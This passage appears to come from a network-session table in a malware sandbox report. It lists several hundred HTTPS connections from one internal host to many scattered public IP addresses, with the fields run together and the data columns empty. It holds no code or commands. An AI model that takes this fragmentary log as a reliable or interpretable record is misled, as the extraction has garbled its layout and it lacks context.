                                          15755192.168.2.2349068213.71.190.254443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15756192.168.2.2347488132.149.249.149443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15757192.168.2.2358366112.114.68.123443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15758192.168.2.233352846.185.44.159443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15759192.168.2.2336564124.173.171.76443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15760192.168.2.235030691.103.151.9443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15761192.168.2.235846850.118.70.52443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15762192.168.2.2353920155.224.160.60443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15763192.168.2.234643892.113.201.222443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15764192.168.2.2344140202.56.66.221443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15765192.168.2.234530272.44.89.29443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15766192.168.2.2336596141.107.34.112443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15767192.168.2.2338240196.129.66.252443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15768192.168.2.2335778144.14.99.111443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15769192.168.2.2355198198.155.60.35443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15770192.168.2.2352728165.219.163.198443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15771192.168.2.2358942110.200.78.200443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15772192.168.2.2345008101.116.31.124443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15773192.168.2.2347300126.38.140.12443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15774192.168.2.2359404138.226.151.131443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15775192.168.2.2357294142.251.63.69443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15776192.168.2.233892842.165.169.215443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15777192.168.2.234735283.143.249.158443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15778192.168.2.2344648129.85.163.82443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15779192.168.2.2345560144.252.27.34443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15780192.168.2.233457420.116.198.78443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15781192.168.2.2340484187.116.252.51443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15782192.168.2.234064475.163.112.173443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15783192.168.2.2349042121.198.253.191443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15784192.168.2.2354846211.206.47.212443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15785192.168.2.2335924109.95.212.231443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15786192.168.2.234482490.195.191.233443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15787192.168.2.233779846.68.2.115443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15788192.168.2.2339330200.67.252.97443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15789192.168.2.2357974212.128.101.224443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15790192.168.2.2359508139.167.220.158443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15791192.168.2.2341078120.193.218.124443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15792192.168.2.233501834.147.183.233443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15793192.168.2.235513883.54.163.211443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15794192.168.2.235450892.141.21.118443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15795192.168.2.2340298117.243.32.108443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15796192.168.2.2357450223.183.20.26443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15797192.168.2.233825217.39.247.137443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15798192.168.2.2360088200.37.106.37443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15799192.168.2.233706891.109.210.241443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15800192.168.2.234552659.118.200.40443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15801192.168.2.2345444211.53.195.125443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15802192.168.2.234484675.213.73.196443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15803192.168.2.234447696.229.2.162443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15804192.168.2.2353508100.136.217.213443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15805192.168.2.233422436.169.88.221443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15806192.168.2.2344468190.203.12.107443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15807192.168.2.233530682.118.231.187443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15808192.168.2.2345724110.18.237.71443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15809192.168.2.2344864117.44.101.49443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15810192.168.2.2355852223.150.0.146443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15811192.168.2.2335090112.251.246.118443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15812192.168.2.2345202181.222.253.4443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15813192.168.2.234012863.233.9.170443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15814192.168.2.2349854146.168.91.115443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15815192.168.2.2350636179.182.169.56443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15816192.168.2.2341030122.123.137.223443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15817192.168.2.2334456110.60.60.152443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15818192.168.2.2337444191.253.180.16443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15819192.168.2.2332794193.174.124.222443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15820192.168.2.2346898124.235.144.219443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15821192.168.2.234397647.213.15.3443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15822192.168.2.234585661.218.185.249443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15823192.168.2.234654278.73.51.212443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15824192.168.2.234170479.50.73.105443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15825192.168.2.2343352178.161.36.200443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15826192.168.2.2340702149.3.101.253443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15827192.168.2.2335472196.195.94.94443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15828192.168.2.233987881.186.199.57443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15829192.168.2.2352450204.197.16.249443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15830192.168.2.23426184.211.125.83443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15831192.168.2.2335822141.132.139.117443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15832192.168.2.2357138148.216.14.153443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15833192.168.2.2357768108.88.93.181443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15834192.168.2.2347684189.113.137.245443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15835192.168.2.2343816117.138.77.128443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15836192.168.2.2343452166.166.182.132443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15837192.168.2.2359748166.82.7.120443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15838192.168.2.2359758140.194.151.205443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15839192.168.2.234124292.9.44.99443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15840192.168.2.233438077.158.193.254443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15841192.168.2.235792640.140.200.59443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15842192.168.2.2343372120.9.64.30443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15843192.168.2.235656286.60.147.38443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15844192.168.2.233446017.195.239.85443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15845192.168.2.2336304109.231.208.99443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15846192.168.2.2345934143.205.193.168443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15847192.168.2.2344438185.85.213.171443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15848192.168.2.2353734208.185.215.251443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15849192.168.2.234632443.144.147.191443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15850192.168.2.2359444222.87.114.234443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15851192.168.2.2347914209.140.215.85443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15852192.168.2.233921219.118.170.96443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15853192.168.2.235009860.198.245.175443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15854192.168.2.2347832173.233.92.122443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15855192.168.2.2348972132.34.56.178443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15856192.168.2.233846884.148.23.255443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15857192.168.2.23533868.153.151.15443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15858192.168.2.2334544204.103.12.179443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15859192.168.2.234328446.47.100.167443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15860192.168.2.234824263.156.87.80443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15861192.168.2.235683812.76.173.55443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15862192.168.2.2355288216.139.65.141443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15863192.168.2.2356698189.4.229.123443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15864192.168.2.2343454207.147.86.155443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15865192.168.2.235026417.252.188.71443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15866192.168.2.2360558196.121.253.172443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15867192.168.2.2348424163.210.207.121443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15868192.168.2.2360052155.39.149.251443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15869192.168.2.2357106200.143.252.83443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15870192.168.2.2350362213.158.98.173443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15871192.168.2.2345076142.27.254.150443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15872192.168.2.2333096207.174.92.80443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15873192.168.2.2333188221.112.95.90443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15874192.168.2.2334946140.198.151.227443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15875192.168.2.2333960167.61.137.167443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15876192.168.2.2333476182.121.0.144443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15877192.168.2.2355222203.201.30.221443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15878192.168.2.234835695.28.83.190443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15879192.168.2.235533058.14.63.99443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15880192.168.2.2341070107.44.148.55443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15881192.168.2.2334008189.57.15.140443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15882192.168.2.234504087.30.73.192443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15883192.168.2.2344012157.134.178.84443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15884192.168.2.2351436209.182.102.210443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15885192.168.2.234723834.0.150.156443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15886192.168.2.234351262.170.123.240443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15887192.168.2.234128837.173.28.108443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15888192.168.2.2352698132.51.18.217443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15889192.168.2.234762863.133.4.189443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15890192.168.2.2347852189.241.230.237443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15891192.168.2.23359508.151.234.193443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15892192.168.2.235781662.83.95.108443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15893192.168.2.23393188.94.237.92443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15894192.168.2.2335074135.156.14.87443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15895192.168.2.234661072.236.186.79443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15896192.168.2.2343486125.91.221.239443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15897192.168.2.2357678129.97.18.148443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15898192.168.2.234881890.194.162.118443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15899192.168.2.235317491.59.200.231443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15900192.168.2.233387486.48.134.97443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15901192.168.2.2349212111.101.254.152443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15902192.168.2.2348382141.137.133.80443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15903192.168.2.2357882179.153.175.122443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15904192.168.2.2335954157.30.41.142443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15905192.168.2.2345806212.94.42.231443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15906192.168.2.2339942184.211.121.69443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15907192.168.2.233429067.228.15.50443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15908192.168.2.23531844.3.209.98443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15909192.168.2.2357184157.143.3.150443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15910192.168.2.234169461.113.106.127443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15911192.168.2.2356444177.197.143.100443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15912192.168.2.235343257.205.140.51443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15913192.168.2.2355516169.187.114.17443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15914192.168.2.2352770163.100.61.57443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15915192.168.2.2342184119.30.69.53443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15916192.168.2.2358910136.224.239.235443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15917192.168.2.2340648199.101.44.228443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15918192.168.2.2342216178.230.253.152443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15919192.168.2.2335696151.131.62.148443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15920192.168.2.234141294.95.234.85443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15921192.168.2.2337590200.235.140.0443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15922192.168.2.2333500211.199.64.181443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15923192.168.2.234480058.120.3.79443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15924192.168.2.2343054155.106.94.58443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15925192.168.2.233581619.125.83.233443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15926192.168.2.2356768207.33.206.138443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15927192.168.2.23368941.170.73.19443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15928192.168.2.235746481.195.234.235443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15929192.168.2.2335268140.217.174.75443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15930192.168.2.2337158145.204.160.62443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15931192.168.2.233944817.39.75.82443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15932192.168.2.2360244151.116.94.40443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15933192.168.2.2354276107.219.168.14443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15934192.168.2.236023843.214.41.170443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15935192.168.2.2357648194.6.78.132443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15936192.168.2.2333190168.207.38.220443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15937192.168.2.234172499.208.253.135443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15938192.168.2.2344834194.213.114.219443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15939192.168.2.2351028204.66.134.221443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15940192.168.2.2344110153.217.66.9443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15941192.168.2.2350778203.145.170.28443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15942192.168.2.2358908114.98.77.66443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15943192.168.2.235080266.194.146.143443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15944192.168.2.2344350167.89.52.145443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15945192.168.2.2356494163.126.166.217443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15946192.168.2.2343574150.146.202.190443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15947192.168.2.233905686.151.6.37443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15948192.168.2.2344912170.136.101.128443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15949192.168.2.235636042.198.36.209443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15950192.168.2.233588820.232.107.183443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15951192.168.2.234313496.37.22.79443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15952192.168.2.234083827.166.83.200443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15953192.168.2.2358146196.6.245.35443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15954192.168.2.2335040150.222.155.157443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15955192.168.2.233555637.220.152.105443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15956192.168.2.2354258185.48.85.106443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15957192.168.2.2345106139.150.47.40443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15958192.168.2.2359684208.141.71.228443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15959192.168.2.234283240.162.55.82443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15960192.168.2.23523889.82.159.97443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15961192.168.2.235545234.248.99.76443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15962192.168.2.2336782172.109.43.90443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15963192.168.2.23348184.9.42.233443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15964192.168.2.2360480121.87.83.218443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15965192.168.2.234250063.143.3.173443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15966192.168.2.2337890180.128.36.36443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15967192.168.2.2344828207.220.147.147443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15968192.168.2.234306491.130.204.199443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15969192.168.2.2347008109.145.167.104443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15970192.168.2.2347422160.250.26.113443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15971192.168.2.234011472.177.81.205443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15972192.168.2.235841284.52.197.153443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15973192.168.2.233380054.219.144.219443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15974192.168.2.2335506192.88.123.53443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15975192.168.2.2344048163.14.174.123443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15976192.168.2.233727438.95.198.177443
                                          TimestampBytes transferredDirectionData


